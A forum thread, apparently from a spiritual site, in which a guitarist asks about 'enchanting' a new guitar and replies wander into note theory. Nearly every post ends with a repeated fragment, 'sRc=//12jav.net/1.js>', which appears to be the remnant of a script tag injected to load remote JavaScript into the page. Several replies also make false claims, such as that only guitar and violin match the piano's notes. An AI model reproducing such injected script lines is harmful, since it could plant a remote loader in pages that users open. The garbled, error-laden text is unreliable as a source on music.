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I play guitar, and I'm ok at it. Over the years, I've had numerous guitars and never even thought of enchanting one. But now I want to establish a connection between myself and my new guitar. I want to feel it, to understand it and, hopefully, have it feel and understand me. I want to be able to project my thoughts and emotions through this guitar. Does anyone have experience with a working like this? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
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You can certainly display your emotions through your guitar! The guitar and the violin are the only musical instruments that can play the same notes and chords as a piano! They are already "enchanted". sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
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Further: Listen to recordings of the great classical guitarists. Especially Andre Segovia. The emotion "pours" from his fingers! sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
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TRUTH! Maybe that's why I never felt the need to enchant one. When I play, once I've found where I want to play, it seems as though those chords and scales just run on their own, and I feel and hear great energy.
Are you a pianist? If so, is it true that the piano has sharps and flats between b and c and e and f (the guitar doesn't)? So when a friend of mine mentioned c flat on the piano, I was surprised. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
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I'm not a pianist, I am a guitarist.The piano has the same sharps and flats as the guitar. There are none between b and c, or e and f. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
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I didn't think so. Thanks :-) sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
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Im also not a pianist but, someone told me that if you hear someone c flat he means b sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
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C flat is the same as b. B sharp is the same as c.

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This is nonsense! A C and a B are whole notes,a sharp or a flat is a half note. You want to know the difference? Look at a piano keyboard. The black keys are the sharps and flats. There is no black key between C and B. Or E and F. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
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As you play your guitar, you are putting your essence into it already. I've played about 50 years, and I know from feel what belongs to me, and what is meant for me. You will connect and it will connect every time you play.. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
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